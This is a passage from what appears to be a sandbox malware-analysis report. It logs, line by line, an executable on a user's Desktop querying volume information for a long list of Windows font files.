Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
